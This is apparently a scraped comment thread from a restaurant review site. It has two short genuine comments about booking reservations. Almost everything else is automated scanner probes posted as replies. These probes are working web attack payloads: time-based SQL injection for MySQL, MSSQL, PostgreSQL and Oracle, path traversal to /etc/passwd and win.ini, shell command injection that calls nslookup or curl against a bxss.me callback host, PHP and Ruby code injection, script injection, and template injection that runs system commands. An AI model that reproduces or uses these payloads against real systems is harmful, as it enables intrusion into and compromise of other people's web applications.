.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Justeat
WEB-INF/web.xml
re: Justeat
WEB-INF\web.xml
re: Justeat
1
re: Justeat
1
re: Justeat
-1 OR 2+617-617-1=0+0+0+1 --
re: Justeat
-1 OR 3+617-617-1=0+0+0+1 --
re: Justeat
-1 OR 2+728-728-1=0+0+0+1
re: Justeat
-1 OR 3+728-728-1=0+0+0+1
re: Justeat
-1' OR 2+212-212-1=0+0+0+1 --
re: Justeat
-1' OR 3+212-212-1=0+0+0+1 --
re: Justeat
-1' OR 2+236-236-1=0+0+0+1 or 'bUrnpJss'='
re: Justeat
-1' OR 3+236-236-1=0+0+0+1 or 'bUrnpJss'='
re: Justeat
-1" OR 2+287-287-1=0+0+0+1 --
re: Justeat
-1" OR 3+287-287-1=0+0+0+1 --
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
jQHuvoOU'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 483=(SELECT 483 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 744=(SELECT 744 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 291=(SELECT 291 FROM PG_SLEEP(15))--
re: Justeat
Ggrr6HCk' OR 309=(SELECT 309 FROM PG_SLEEP(15))--
re: Justeat
rX0iombE') OR 814=(SELECT 814 FROM PG_SLEEP(15))--
re: Justeat
s6RHfI1d')) OR 23=(SELECT 23 FROM PG_SLEEP(15))--
re: Justeat
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@RO4b9
re: Justeat
1BARTTIM7I0
re: Justeat
response.write(9160515*9247818)
re: Justeat
'+response.write(9160515*9247818)+'
re: Justeat
"+response.write(9160515*9247818)+"
re: Justeat
../../../../../../../../../../../../../../etc/passwd
re: Justeat
../../../../../../../../../../../../../../windows/win.ini
re: Justeat
file:///etc/passwd
re: Justeat
<esi:include src="http://bxss.me/rpb.png"/>
re: Justeat
../
re: Justeat
${9999541+9999556}
re: Justeat
redirtest.acx
re: Justeat
)
re: Justeat
!(()&&!|*|*|
re: Justeat
^(#$!@#$)(()))******
re: Justeat
echo sshadf$()\ vgpjpy\nz^xyu||a #' &echo sshadf$()\ vgpjpy\nz^xyu||a #|" &echo sshadf$()\ vgpjpy\nz^xyu||a #
re: Justeat
'.gethostbyname(lc('hitvn'.'dmneravfdeb2e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(80).chr(100).chr(83).'
re: Justeat
&echo tjkvum$()\ xpadgf\nz^xyu||a #' &echo tjkvum$()\ xpadgf\nz^xyu||a #|" &echo tjkvum$()\ xpadgf\nz^xyu||a #
re: Justeat
".gethostbyname(lc("hitrk"."uarmhkqhbca72.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(71).chr(110).chr(69)."
re: Justeat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Justeat
|echo wwqpre$()\ iausww\nz^xyu||a #' |echo wwqpre$()\ iausww\nz^xyu||a #|" |echo wwqpre$()\ iausww\nz^xyu||a #
re: Justeat
gethostbyname(lc('hitds'.'gilyhbubb1b5d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(84).chr(104).chr(81)
re: Justeat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Justeat
expr 9000587276 - 963634
re: Justeat
/etc/shells
re: Justeat
(nslookup -q=cname hitzvljnyauka6e9c1.bxss.me||curl hitzvljnyauka6e9c1.bxss.me))
re: Justeat
../../../../../../../../../../../../../../etc/shells
re: Justeat
$(nslookup -q=cname hitfybvfsrohfad06e.bxss.me||curl hitfybvfsrohfad06e.bxss.me)
re: Justeat
c:/windows/win.ini
re: Justeat
&nslookup -q=cname hitsoewkcrqeta4ae4.bxss.me&'\"`0&nslookup -q=cname hitsoewkcrqeta4ae4.bxss.me&`'
re: Justeat
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Justeat
bxss.me
re: Justeat
&(nslookup -q=cname hitggyemobmjv22e75.bxss.me||curl hitggyemobmjv22e75.bxss.me)&'\"`0&(nslookup -q=cname hitggyemobmjv22e75.bxss.me||curl hitggyemobmjv22e75.bxss.me)&`'
re: Justeat
Http://bxss.me/t/fit.txt
re: Justeat
|(nslookup -q=cname hitvlafwpghpv39a90.bxss.me||curl hitvlafwpghpv39a90.bxss.me)
re: Justeat
http://bxss.me/t/fit.txt?.jpg
re: Justeat
`(nslookup -q=cname hitqutmfttqpudd901.bxss.me||curl hitqutmfttqpudd901.bxss.me)`
re: Justeat
;(nslookup -q=cname hitmszbbjnjan8e55a.bxss.me||curl hitmszbbjnjan8e55a.bxss.me)|(nslookup -q=cname hitmszbbjnjan8e55a.bxss.me||curl hitmszbbjnjan8e55a.bxss.me)&(nslookup -q=cname hitmszbbjnjan8e55a.bxss.me||curl hitmszbbjnjan8e55a.bxss.me)
re: Justeat
'"()
re: Justeat
|(nslookup${IFS}-q${IFS}cname${IFS}hithivrrfbkgkf98c3.bxss.me||curl${IFS}hithivrrfbkgkf98c3.bxss.me)
re: Justeat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Justeat
'&&sleep(27*1000)*sivsre&&'
re: Justeat
&(nslookup${IFS}-q${IFS}cname${IFS}hitsotqsecsaq9e00a.bxss.me||curl${IFS}hitsotqsecsaq9e00a.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitsotqsecsaq9e00a.bxss.me||curl${IFS}hitsotqsecsaq9e00a.bxss.me)&`'
re: Justeat
';print(md5(31337));$a='
re: Justeat
"&&sleep(27*1000)*igxnmn&&"
re: Justeat
";print(md5(31337));$a="
re: Justeat
'||sleep(27*1000)*bmnrqe||'
re: Justeat
${@print(md5(31337))}
re: Justeat
"||sleep(27*1000)*ygwgdf||"
re: Justeat
${@print(md5(31337))}\
re: Justeat
'.print(md5(31337)).'
re: Justeat
HttP://bxss.me/t/xss.html?%00
re: Justeat
bxss.me/t/xss.html?%00
re: Justeat
"+"A".concat(70-3).concat(22*4).concat(114).concat(84).concat(107).concat(76)+(require"socket"
Socket.gethostbyname("hitqy"+"bymywzbed8c99.bxss.me.")[3].to_s)+"
re: Justeat
replies
re: Justeat
'+'A'.concat(70-3).concat(22*4).concat(113).concat(80).concat(120).concat(79)+(require'socket'
Socket.gethostbyname('hitvr'+'clxxkbmf93e3e.bxss.me.')[3].to_s)+'
re: Justeat
replies�
re: Justeat
'"
re: Justeat
'A'.concat(70-3).concat(22*4).concat(109).concat(66).concat(102).concat(71)+(require'socket'
Socket.gethostbyname('hitva'+'zaugreos10c2b.bxss.me.')[3].to_s)
re: Justeat
replies/.
re: Justeat
<!--
re: Justeat
'"()&%<zzz><ScRiPt >NO5v(9968)</ScRiPt>
re: Justeat
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitoiapmfmswa526d4.bxss.me")}}
re: Justeat
'"()&%<zzz><ScRiPt >NO5v(9380)</ScRiPt>
re: Justeat
9081068
re: Justeat
tD2VQVny
re: Justeat
*1
re: Justeat
*1
re: Justeat
*1
re: Justeat
*1
re: Justeat
-1 OR 5*5=25 --
re: Justeat
-1 OR 5*5=26 --
re: Justeat
-1 OR 5*5=25
re: Justeat
-1 OR 5*5=26
re: Justeat
*if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
-1 waitfor delay '0:0:15' --
re: Justeat
NcBmz29a'; waitfor delay '0:0:15' --
re: Justeat
-1 OR 137=(SELECT 137 FROM PG_SLEEP(15))--
re: Justeat
-1) OR 217=(SELECT 217 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 154=(SELECT 154 FROM PG_SLEEP(15))--
re: Justeat
BQoz8Rf4' OR 689=(SELECT 689 FROM PG_SLEEP(15))--
re: Justeat
LwX0x0yA') OR 452=(SELECT 452 FROM PG_SLEEP(15))--
re: Justeat
Q05iEb7J')) OR 710=(SELECT 710 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
'"
re: Justeat
@@NpVq7
re: Justeat
(select 198766*667891)
re: Justeat
(select 198766*667891 from DUAL)
They accept reservations 4 months in advance at the beginning of each month. Phone calls are not easy to get through.
re: Leo Saito
NULmVMAl
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+258-258-1=0+0+0+1
re: Leo Saito
-1 OR 3+258-258-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
kfbovFhn'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 531=(SELECT 531 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 172=(SELECT 172 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 450=(SELECT 450 FROM PG_SLEEP(15))--
re: Leo Saito
U8SomoQp' OR 377=(SELECT 377 FROM PG_SLEEP(15))--
re: Leo Saito
hhHddFyl') OR 47=(SELECT 47 FROM PG_SLEEP(15))--
re: Leo Saito
MSS1Rrcx')) OR 783=(SELECT 783 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@5Pk5c
re: Leo Saito
adr9bluu
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+356-356-1=0+0+0+1
re: Leo Saito
-1 OR 3+356-356-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
h46TolRv'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 322=(SELECT 322 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 85=(SELECT 85 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 252=(SELECT 252 FROM PG_SLEEP(15))--
re: Leo Saito
sHPH1ush' OR 913=(SELECT 913 FROM PG_SLEEP(15))--
re: Leo Saito
UDktJgJ1') OR 188=(SELECT 188 FROM PG_SLEEP(15))--
re: Leo Saito
zRkhlWtR')) OR 768=(SELECT 768 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@GM9z7
re: Leo Saito
1P9VNO2S90
re: Leo Saito
response.write(9687516*9663124)
re: Leo Saito
'+response.write(9687516*9663124)+'
re: Leo Saito
"+response.write(9687516*9663124)+"
re: Leo Saito
../../../../../../../../../../../../../../etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../windows/win.ini
re: Leo Saito
<esi:include src="http://bxss.me/rpb.png"/>
re: Leo Saito
file:///etc/passwd
re: Leo Saito
${9999363+9999090}
re: Leo Saito
../
re: Leo Saito
)
re: Leo Saito
!(()&&!|*|*|
re: Leo Saito
redirtest.acx
re: Leo Saito
^(#$!@#$)(()))******
re: Leo Saito
echo jxdbyg$()\ alqivj\nz^xyu||a #' &echo jxdbyg$()\ alqivj\nz^xyu||a #|" &echo jxdbyg$()\ alqivj\nz^xyu||a #
re: Leo Saito
&echo ijwoit$()\ nyfnyw\nz^xyu||a #' &echo ijwoit$()\ nyfnyw\nz^xyu||a #|" &echo ijwoit$()\ nyfnyw\nz^xyu||a #
re: Leo Saito
|echo hwzave$()\ kzyovv\nz^xyu||a #' |echo hwzave$()\ kzyovv\nz^xyu||a #|" |echo hwzave$()\ kzyovv\nz^xyu||a #
re: Leo Saito
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Leo Saito
'.gethostbyname(lc('hitre'.'nimaszwgcdf61.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(65).chr(119).chr(79).'
re: Leo Saito
expr 9000525073 - 956092
re: Leo Saito
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Leo Saito
".gethostbyname(lc("hituw"."tcozyycbc269e.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(88).chr(98).chr(80)."
re: Leo Saito
(nslookup -q=cname hitrbivrrfeon449fd.bxss.me||curl hitrbivrrfeon449fd.bxss.me))
re: Leo Saito
gethostbyname(lc('hitwn'.'ptlhmery15291.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(86).chr(112).chr(89)
re: Leo Saito
/etc/shells
re: Leo Saito
$(nslookup -q=cname hitlizgjrcrccf3c78.bxss.me||curl hitlizgjrcrccf3c78.bxss.me)
re: Leo Saito
../../../../../../../../../../../../../../etc/shells
re: Leo Saito
&nslookup -q=cname hitgqufghccjkca709.bxss.me&'\"`0&nslookup -q=cname hitgqufghccjkca709.bxss.me&`'
re: Leo Saito
c:/windows/win.ini
re: Leo Saito
&(nslookup -q=cname hitayhrlgzsntcc0c5.bxss.me||curl hitayhrlgzsntcc0c5.bxss.me)&'\"`0&(nslookup -q=cname hitayhrlgzsntcc0c5.bxss.me||curl hitayhrlgzsntcc0c5.bxss.me)&`'
re: Leo Saito
bxss.me
re: Leo Saito
|(nslookup -q=cname hitcootyuxdbde3bbf.bxss.me||curl hitcootyuxdbde3bbf.bxss.me)
re: Leo Saito
Http://bxss.me/t/fit.txt
re: Leo Saito
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Leo Saito
`(nslookup -q=cname hithpjqrwrytq6961a.bxss.me||curl hithpjqrwrytq6961a.bxss.me)`
re: Leo Saito
http://bxss.me/t/fit.txt?.jpg
re: Leo Saito
;(nslookup -q=cname hitrzjtxzwoau1c193.bxss.me||curl hitrzjtxzwoau1c193.bxss.me)|(nslookup -q=cname hitrzjtxzwoau1c193.bxss.me||curl hitrzjtxzwoau1c193.bxss.me)&(nslookup -q=cname hitrzjtxzwoau1c193.bxss.me||curl hitrzjtxzwoau1c193.bxss.me)
re: Leo Saito
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Leo Saito
|(nslookup${IFS}-q${IFS}cname${IFS}hitkstxhmqmva7b57c.bxss.me||curl${IFS}hitkstxhmqmva7b57c.bxss.me)
re: Leo Saito
';print(md5(31337));$a='
re: Leo Saito
&(nslookup${IFS}-q${IFS}cname${IFS}hitshntwynonb547ef.bxss.me||curl${IFS}hitshntwynonb547ef.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitshntwynonb547ef.bxss.me||curl${IFS}hitshntwynonb547ef.bxss.me)&`'
re: Leo Saito
";print(md5(31337));$a="
re: Leo Saito
${@print(md5(31337))}
re: Leo Saito
${@print(md5(31337))}\
re: Leo Saito
'"()
re: Leo Saito
'.print(md5(31337)).'
re: Leo Saito
'&&sleep(27*1000)*ydjdfi&&'
re: Leo Saito
"&&sleep(27*1000)*hrrcrb&&"
re: Leo Saito
'||sleep(27*1000)*kqbbkw||'
re: Leo Saito
"||sleep(27*1000)*wkoqbq||"
re: Leo Saito
HttP://bxss.me/t/xss.html?%00
re: Leo Saito
bxss.me/t/xss.html?%00
re: Leo Saito
"+"A".concat(70-3).concat(22*4).concat(116).concat(68).concat(101).concat(82)+(require"socket"
Socket.gethostbyname("hitnn"+"hrcvjvrab0eb7.bxss.me.")[3].to_s)+"
re: Leo Saito
'+'A'.concat(70-3).concat(22*4).concat(122).concat(80).concat(121).concat(76)+(require'socket'
Socket.gethostbyname('hitjz'+'qkepnyggf2a0e.bxss.me.')[3].to_s)+'
re: Leo Saito
'A'.concat(70-3).concat(22*4).concat(100).concat(88).concat(121).concat(77)+(require'socket'
Socket.gethostbyname('hitvs'+'wvepyxsb4c8c7.bxss.me.')[3].to_s)
re: Leo Saito
replies
re: Leo Saito
'"
re: Leo Saito
replies�
re: Leo Saito
<!--
re: Leo Saito
replies/.
re: Leo Saito
'"()&%<zzz><ScRiPt >pW4j(9539)</ScRiPt>
re: Leo Saito
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hituipzanordf7024b.bxss.me")}}
re: Leo Saito
'"()&%<zzz><ScRiPt >pW4j(9354)</ScRiPt>
re: Leo Saito
9496274
re: Leo Saito
TJHJHgFe
re: Leo Saito
*1
re: Leo Saito
*1
re: Leo Saito
*1
re: Leo Saito
*1
re: Leo Saito
-1 OR 5*5=25 --
re: Leo Saito
-1 OR 5*5=26 --
re: Leo Saito
-1 OR 5*5=25
re: Leo Saito
-1 OR 5*5=26
re: Leo Saito
*if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
-1 waitfor delay '0:0:15' --
re: Leo Saito
1oqkYAjt'; waitfor delay '0:0:15' --
re: Leo Saito
-1 OR 242=(SELECT 242 FROM PG_SLEEP(15))--
re: Leo Saito
-1) OR 63=(SELECT 63 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 642=(SELECT 642 FROM PG_SLEEP(15))--
re: Leo Saito
NF9diJFK' OR 127=(SELECT 127 FROM PG_SLEEP(15))--
re: Leo Saito
XV1OwIfb') OR 766=(SELECT 766 FROM PG_SLEEP(15))--
re: Leo Saito
gPvLLbmS')) OR 768=(SELECT 768 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
'"
re: Leo Saito
@@VoZxM
re: Leo Saito
(select 198766*667891)
re: Leo Saito
(select 198766*667891 from DUAL)
I went very recently, and it's still in my top 3. It is relatively hard to get these days though, especially since foreigners can only book 2 months in advance so most slots are taken. But it's not impossible through Pocket Concierge with enough flexibility.
Definitely worth trying for it. Also only 33k is an absolute steal for the quality and quantity you get.
re: Eric Yu
I8C677x7
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+282-282-1=0+0+0+1
re: Eric Yu
-1 OR 3+282-282-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
AYdhrSac'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 650=(SELECT 650 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 374=(SELECT 374 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 228=(SELECT 228 FROM PG_SLEEP(15))--
re: Eric Yu
LLKCGo6v' OR 822=(SELECT 822 FROM PG_SLEEP(15))--
re: Eric Yu
X0EpzYdt') OR 259=(SELECT 259 FROM PG_SLEEP(15))--
re: Eric Yu
gcIK0jOn')) OR 622=(SELECT 622 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@w0tTS
re: Eric Yu
br6PwN6s
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+934-934-1=0+0+0+1
re: Eric Yu
-1 OR 3+934-934-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
59Fw8kPc'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 476=(SELECT 476 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 986=(SELECT 986 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 33=(SELECT 33 FROM PG_SLEEP(15))--
re: Eric Yu
MkIrA72R' OR 740=(SELECT 740 FROM PG_SLEEP(15))--
re: Eric Yu
pEgFi8l3') OR 998=(SELECT 998 FROM PG_SLEEP(15))--
re: Eric Yu
RVjyKcYZ')) OR 310=(SELECT 310 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@QTLqr
re: Eric Yu
1YCMG9ODN0
re: Eric Yu
response.write(9858949*9321206)
re: Eric Yu
'+response.write(9858949*9321206)+'
re: Eric Yu
"+response.write(9858949*9321206)+"
re: Eric Yu
../../../../../../../../../../../../../../etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../windows/win.ini
re: Eric Yu
<esi:include src="http://bxss.me/rpb.png"/>
re: Eric Yu
file:///etc/passwd
re: Eric Yu
${9999842+9999574}
re: Eric Yu
../
re: Eric Yu
)
re: Eric Yu
!(()&&!|*|*|
re: Eric Yu
redirtest.acx
re: Eric Yu
^(#$!@#$)(()))******
re: Eric Yu
'.gethostbyname(lc('hitxp'.'sczpjuwn1226d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(70).chr(113).chr(73).'
re: Eric Yu
echo jaewbp$()\ bbnpsd\nz^xyu||a #' &echo jaewbp$()\ bbnpsd\nz^xyu||a #|" &echo jaewbp$()\ bbnpsd\nz^xyu||a #
re: Eric Yu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Eric Yu
&echo pukxgj$()\ frrjqt\nz^xyu||a #' &echo pukxgj$()\ frrjqt\nz^xyu||a #|" &echo pukxgj$()\ frrjqt\nz^xyu||a #
re: Eric Yu
".gethostbyname(lc("hitwk"."lspsmkgrd62c4.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(87).chr(106).chr(65)."
re: Eric Yu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Eric Yu
|echo rzesum$()\ wogjdt\nz^xyu||a #' |echo rzesum$()\ wogjdt\nz^xyu||a #|" |echo rzesum$()\ wogjdt\nz^xyu||a #
re: Eric Yu
gethostbyname(lc('hitbt'.'fhkqfqeqbef25.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(83).chr(99).chr(72)
re: Eric Yu
/etc/shells
re: Eric Yu
expr 9000111301 - 946391
re: Eric Yu
../../../../../../../../../../../../../../etc/shells
re: Eric Yu
(nslookup -q=cname hitkxksnngpzr97e97.bxss.me||curl hitkxksnngpzr97e97.bxss.me))
re: Eric Yu
c:/windows/win.ini
re: Eric Yu
$(nslookup -q=cname hitgvwvutexprbf6fb.bxss.me||curl hitgvwvutexprbf6fb.bxss.me)
re: Eric Yu
bxss.me
re: Eric Yu
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Eric Yu
&nslookup -q=cname hitoguaucfpdn5b97b.bxss.me&'\"`0&nslookup -q=cname hitoguaucfpdn5b97b.bxss.me&`'
re: Eric Yu
Http://bxss.me/t/fit.txt
re: Eric Yu
&(nslookup -q=cname hitcjheyzxxadb83f0.bxss.me||curl hitcjheyzxxadb83f0.bxss.me)&'\"`0&(nslookup -q=cname hitcjheyzxxadb83f0.bxss.me||curl hitcjheyzxxadb83f0.bxss.me)&`'
re: Eric Yu
http://bxss.me/t/fit.txt?.jpg
re: Eric Yu
|(nslookup -q=cname hitcriuglwosle5ec8.bxss.me||curl hitcriuglwosle5ec8.bxss.me)
re: Eric Yu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Eric Yu
`(nslookup -q=cname hitcvgxhqntmtbf5ec.bxss.me||curl hitcvgxhqntmtbf5ec.bxss.me)`
re: Eric Yu
';print(md5(31337));$a='
re: Eric Yu
;(nslookup -q=cname hitgeixwmiijkc9ea0.bxss.me||curl hitgeixwmiijkc9ea0.bxss.me)|(nslookup -q=cname hitgeixwmiijkc9ea0.bxss.me||curl hitgeixwmiijkc9ea0.bxss.me)&(nslookup -q=cname hitgeixwmiijkc9ea0.bxss.me||curl hitgeixwmiijkc9ea0.bxss.me)
re: Eric Yu
'"()
re: Eric Yu
";print(md5(31337));$a="
re: Eric Yu
|(nslookup${IFS}-q${IFS}cname${IFS}hitgsnbjutrbm89d6a.bxss.me||curl${IFS}hitgsnbjutrbm89d6a.bxss.me)
re: Eric Yu
'&&sleep(27*1000)*bahovy&&'
re: Eric Yu
${@print(md5(31337))}
re: Eric Yu
&(nslookup${IFS}-q${IFS}cname${IFS}hitscnvcdtlds8a3ad.bxss.me||curl${IFS}hitscnvcdtlds8a3ad.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitscnvcdtlds8a3ad.bxss.me||curl${IFS}hitscnvcdtlds8a3ad.bxss.me)&`'
re: Eric Yu
"&&sleep(27*1000)*rhqdbh&&"
re: Eric Yu
${@print(md5(31337))}\
re: Eric Yu
'||sleep(27*1000)*vygeqa||'
re: Eric Yu
'.print(md5(31337)).'
